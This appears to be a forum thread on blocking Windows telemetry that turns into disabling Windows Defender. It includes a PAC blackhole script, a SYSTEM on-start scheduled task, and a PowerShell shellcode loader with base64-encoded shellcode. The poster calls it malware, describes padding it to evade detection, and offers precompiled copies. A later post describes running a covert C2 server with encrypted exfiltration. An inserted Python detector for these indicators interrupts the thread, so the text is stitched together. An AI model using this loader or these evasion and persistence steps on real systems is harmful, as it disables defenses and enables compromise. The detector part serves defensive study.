    <script type="application/x-ns-proxy-autoconfig">

    // Declare vars
    var normal = "DIRECT";
    var blackhole = "PROXY 127.0.0.1:55555";

    function FindProxyForURL(url, host) {

    if (dnsResolve(host) || shExpMatch(host, '*.local')
    || isInNet(dnsResolve(host), '10.0.0.0', '255.0.0.0')
    || isInNet(dnsResolve(host), '172.16.0.0', '255.240.0.0')
    || isInNet(dnsResolve(host), '192.168.0.0', '255.255.0.0')
    || isInNet(dnsResolve(host), '127.0.0.0', '255.255.255.0')) {
    return normal;
    }

    if (shExpMatch(url, "*oca.telemetry.microsoft.com*")
    || shExpMatch(url, "*telecommand.telemetry.microsoft.com*")
    || shExpMatch(url, "*oca.telemetry.microsoft.com.nsatc.net*")
    || shExpMatch(url, "*a-0001.a-msedge.net*")
    || shExpMatch(url, "*a-0002.a-msedge.net*")
    || shExpMatch(url, "*a-0003.a-msedge.net*")
    || shExpMatch(url, "*a-0004.a-msedge.net*")
    || shExpMatch(url, "*a-0004.a-msedge.net*")
    || shExpMatch(url, "*a-0005.a-msedge.net*")
    || shExpMatch(url, "*a-0006.a-msedge.net*")
    || shExpMatch(url, "*a-0006.a-msedge.net*")
    || shExpMatch(url, "*a-0007.a-msedge.net*")
    || shExpMatch(url, "*a-0008.a-msedge.net*")
    || shExpMatch(url, "*a-0009.a-msedge.net*")
    || shExpMatch(url, "*i1.services.social.microsoft.com")
    || shExpMatch(url, "*telecommand.telemetry.microsoft.com.nsatc.net*")
    || shExpMatch(url, "*sqm.df.telemetry.microsoft.com*")
    || shExpMatch(url, "telemetry.appex.bing.net*")
    || shExpMatch(url, "*settings-sandbox.data.microsoft.com*")
    || shExpMatch(url, "*pre.footprintpredict.com")
    || shExpMatch(url, "*aidps.atdmt.com*")
    || shExpMatch(url, "*aka-cdn-ns.adtech.de*")
    || shExpMatch(url, "*a-msedge.net*")
    || shExpMatch(url, "*b.rad.msn.com*")
    || shExpMatch(url, "*az361816.vo.msecnd.net*")
    || shExpMatch(url, "*b.ads1.msn.com*")
    || shExpMatch(url, "*b.ads2.msads.net*")
    || shExpMatch(url, "*watson.telemetry.microsoft.com*")
    || shExpMatch(url, "*wes.df.telemetry.microsoft.com*")
    || shExpMatch(url, "*bs.serving-sys.com*")
    || shExpMatch(url, "*redir.metaservices.microsoft.com*")
    || shExpMatch(url, "*reports.wes.df.telemetry.microsoft.com*")
    || shExpMatch(url, "*cs1.wpc.v0cdn.net*")
    || shExpMatch(url, "*corpext.msitadfs.glbdns2.microsoft.comt*")
    || shExpMatch(url, "*df.telemetry.microsoft.com*")
    || shExpMatch(url, "*services.wes.df.telemetry.microsoft.com*")
    || shExpMatch(url, "*watson.telemetry.microsoft.com.nsatc.net*")
    || shExpMatch(url, "*sqm.telemetry.microsoft.com*")
    || shExpMatch(url, "*sqm.telemetry.microsoft.com.nsatc.net*")
    || shExpMatch(url, "*watson.ppe.telemetry.microsoft.com*")
    || shExpMatch(url, "*telemetry.microsoft.com*")
    || shExpMatch(url, "*telemetry.urs.microsoft.com*")
    || shExpMatch(url, "*survey.watson.microsoft.com*")
    || shExpMatch(url, "*watson.live.com*")
    || shExpMatch(url, "*vortex-sandbox.data.microsoft.com*")
    || shExpMatch(url, "*settings-win.data.microsoft.com*")
    || shExpMatch(url, "*watson.microsoft.com*")
    || shExpMatch(url, "*db3aqu.atdmt.com*")
    || shExpMatch(url, "*diagnostics.support.microsoft.com*")
    || shExpMatch(url, "*statsfe2.update.microsoft.com.akadns.net*")
    || shExpMatch(url, "*fe2.update.microsoft.com.akadns.net*")
    || shExpMatch(url, "*schemas.microsoft.akadns.net*")
    || shExpMatch(url, "*feedback.microsoft-hohm.com*")
    || shExpMatch(url, "*feedback.search.microsoft.com*")
    || shExpMatch(url, "*statsfe1.ws.microsoft.com*")
    || shExpMatch(url, "*statsfe1.ws.microsoft.com*")
    || shExpMatch(url, "*c.atdmt.com*")) {
    // This list may be incomplete and/or slightly outdated
    // TODO: Fix that
    return blackhole;

    } else {
    return normal;
    }
    }
    </script>


    For a perfectly adequate blackhole server, pip has you covered. If you have the Python interpreter and pip installed you can use the following commands to grab the server in question.
    pip install tcp_blackhole


    Easy. When you're invoking the script either through 'python -m tcp_blackhole.py' or by calling it from a different script/utility make sure the argument for http mode is set to True. And set the port argument to 55555. So that it's commensurate with the PAC Script.

    To persist this state of affairs once everything is in place, another scheduled task may be in order.
    schtasks /create /tn 'StageProxyOps' /tr powershell %WINDIR%\HTTP-Proxy-Server.ps1 /sc onstart /ru System


    Which reminds me, if you want to try something a little more pro-active with regards to the script that kills WinDefender i generated the following

    Set-StrictMode -Version 2
    $dQA = @"
    using System;
    using System.Runtime.InteropServices;
    namespace c5qI1 {
    public class func {
    [Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
    [Flags] public enum MemoryProtection { ReadWrite = 0x04, Execute= 0x10 }
    [Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
    [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    [DllImport("kernel32.dll")] public static extern bool VirtualProtect(IntPtr lpAddress, int dwSize, int flNewProtect,out int lpflOldProtect);
    [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
    [DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
    }
    }
    "@

    $g_ = New-Object Microsoft.CSharp.CSharpCodeProvider
    $kp_ = New-Object System.CodeDom.Compiler.CompilerParameters
    $kp_.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
    $kp_.GenerateInMemory = $True
    $qwx = $g_.CompileAssemblyFromSource($kp_, $dQA)

    [Byte[]]$gycNB = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1qAY2FsgAAAFBoMYtvh//Vu/C1olZoppW9nf/VPAZ8CoD74HUFu0cTcm9qAFP/1XBvd2Vyc2hlbGwgLU5vUCAtZXhlYyBieXBhc3MgLlwlV0lORElSJVx3aW5leGVjMi5wczEA")
    [Uint32]$h9koM = 0

    $vnJp = [c5qI1.func]::VirtualAlloc(0, $gycNB.Length + 1, [c5qI1.func+AllocationType]::Reserve -bOr [c5qI1.func+AllocationType]::Commit, [c5qI1.func+MemoryProtection]::ReadWrite)
    if ([Bool]!$vnJp) { $global:result = 3; return }
    [System.Runtime.InteropServices.Marshal]::Copy($gycNB, 0, $vnJp, $gycNB.Length)

    if ([c5qI1.func]::VirtualProtect($vnJp,[Uint32]$gycNB.Length + 1, [c5qI1.func+MemoryProtection]::Execute, [Ref]$h9koM) -eq $true ) {
    [IntPtr] $yU_ = [c5qI1.func]::CreateThread(0,0,$vnJp,0,0,0)
    if ([Bool]!$yU_) { $global:result = 7; return }
    $nQ_ = [c5qI1.func]::WaitForSingleObject($yU_, [c5qI1.func+Time]::Infinite)
    }


    As you can see this powershell script has inline C#, that's to build a special DLL that will mimic kernel32 DLL, but for our ends. Kernel32.dll in short is involved with memory management, I/O, and its process lives in kernelland. Which is good. A bit further down you can see a Base64 encoded string, this is actually encoded shellcode and we're going to use functions imported from kernel32.dll to inject that shellcode(once decoded) into memory using the CreateRemoteThread Method. Once injected it's going to fire off the equivalent of this command: powershell -NoP -exec bypass -c .\%WINDIR%\windef.ps1.

    As you can tell it's going to assume the WinDefKiller script lives in the %WINDIR% and is called windef.ps1. The point being that when done like this you won't be running the script from your user context but it will run in the context of the process doing the invoking.

    Anyway i was bored so i made some stuff to drop the WinDefKiller script in its expected spot, automatically launch it through the script you see above and on top of that also add a scheduled task. then i put it all together into one big beautiful executable and padded the executable out to the point of low entropy in order to fly under the radar while Windows Defender still lives. It's basically malware, so if you are feeling adventurous shoot me a message and i may send you a precompiled executable. For fully automated Windows Defender murdering madness.

    Here's what it looks like on the inside:



    Anyway i hope you found all that at least somewhat informative, but mostly useful. I genuinely despise the way Micro$oft goes about these things. Unfortunately I'm gonna have to make a new edition of this thread for Windows 11 pretty soon, i think.
    The following users say it would be alright if the author of this post didn't die in a fire!
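Added example, not part of the original post: a defender-side triage pass over PowerShell script block text and process command lines that flags the tampering the post describes (Defender policy values, Set-MpPreference switches, a drive-root exclusion, the WinDefend start type, an on-start SYSTEM task, an in-memory loader). The rule names, record ids and sample records are constructed for illustration.

```python
import re

# Indicators built from the cmdlets, registry values and commands named in the post.
RULES = [
    ("defender_policy_value",       # values written under HKLM\SOFTWARE\Policies\Microsoft
     re.compile(r"Policies\\Microsoft\\(?:Windows Defender|MRT)[^\n]*?-Name\s+[\"']?"
                r"(DisableAntiSpyware|DisableRoutinelyTakingAction|SpyNetReporting|"
                r"SubmitSampleConsent|DontReportInfectionInformation)", re.I)),
    ("mppreference_disable",        # Set-MpPreference -Disable<Feature> $true
     re.compile(r"Set-MpPreference\s+-(Disable\w+)\s+\$true", re.I)),
    ("drive_root_exclusion",        # an exclusion covering a whole drive, not a subfolder
     re.compile(r"Add-MpPreference\s+-ExclusionPath\s+[\"']?([A-Za-z]:\\)[\"']?(?:\s|$)", re.I)),
    ("windefend_service_disabled",  # services\WinDefend Start set to 4 (disabled)
     re.compile(r"services\\WinDefend[^\n]*?-Name\s+[\"']?Start[\"']?\s+-Value\s+4\b", re.I)),
    ("system_onstart_task",         # schtasks /create ... /sc onstart /ru System
     re.compile(r"schtasks(?:\.exe)?\s+/create\b(?=[^\n]*/sc\s+onstart)"
                r"(?=[^\n]*/ru\s+[\"']?System)", re.I)),
]
# In-memory loader: every token must occur in the same script block.
LOADER_TOKENS = ("VirtualAlloc", "VirtualProtect", "CreateThread", "FromBase64String")


def scan(text):
    """Return sorted (rule id, matched detail) pairs for one log record."""
    hits = set()
    for rule_id, rx in RULES:
        for m in rx.finditer(text):
            hits.add((rule_id, m.group(m.lastindex or 0)))
    if all(tok.lower() in text.lower() for tok in LOADER_TOKENS):
        hits.add(("in_memory_loader", "+".join(LOADER_TOKENS)))
    return sorted(hits)


def triage(records):
    """Map record id -> hits, dropping records with no match."""
    scanned = {rid: scan(text) for rid, text in records.items()}
    return {rid: hits for rid, hits in scanned.items() if hits}


# Constructed sample records (not real telemetry): script block text (event 4104)
# and a process command line (event 4688). Payloads are elided placeholders.
SAMPLE = {
    "4104-a": r'New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" '
              r'-Name "DisableAntiSpyware" -Value 1 -PropertyType DWORD -Force' "\n"
              r"Set-MpPreference -DisableRealTimeMonitoring $true -Force",
    "4688-b": r"schtasks /create /tn 'windef' /tr powershell %WINDIR%\windev.ps1 /sc onstart /ru System",
    "4104-c": r"Set-MpPreference -DisableRealtimeMonitoring $false" "\n"
              r'Add-MpPreference -ExclusionPath "C:\build\cache"',
    "4104-d": r'Add-MpPreference -ExclusionPath "C:\" -Force' "\n"
              r'Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\services\WinDefend" -Name "Start" -Value 4',
    "4104-e": "Add-Type: VirtualAlloc(...); VirtualProtect(...); CreateThread(...)\n"
              "$b = [Convert]::FromBase64String('<payload elided>')",
}

if __name__ == "__main__":
    for rid, hits in triage(SAMPLE).items():
        print(rid, hits)
```

Record 4104-c stays quiet on purpose: re-enabling real-time monitoring and excluding a single build folder are routine administration, while a drive-root exclusion or a disabled service start type is not.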
  19. Sophie Pedophile Tech Support
    This whole forum business is just a sideshow. In fact this is an elaborate front for a pretty epic command and control server. Why do you think we had to custom write this bad boy*Slaps Forum* with Python's Django framework? We had to homebrew in order to get the features and functionality required to use the stealth C2 Server. Websites, those with a focus on text are great for this sort of thing.

    Generally speaking the victims of a malware operation will have by default a http(Port 80) and TLS(Port 443) connection available to them. For their browsers you see. Even if you don't have an encrypted connection, say you can only have your malware contact the C2 over HTTP, that's still no problem. It's very easy in most programming languages to write a function to encrypt data with AES-256 and then Base64 the result, B64 encoded anything is easy to transport over HTTP/S. Plus maybe you're running a ransomware campaign, the crypto routines double for exfil and target data encryption in that case. Ya dig?
    The following users say it would be alright if the author of this post didn't die in a fire!
  20. Sophie Pedophile Tech Support
    Originally posted by Sudo But ya I'd meet up with anyone on this website and see where it goes.

    Would you do lines of speed and wax philosophical with me all night? If you wanna make it extra gay we could do exactly the same but in a little pedal boat for two shaped like a swan on a lake somewhere.
    The following users say it would be alright if the author of this post didn't die in a fire!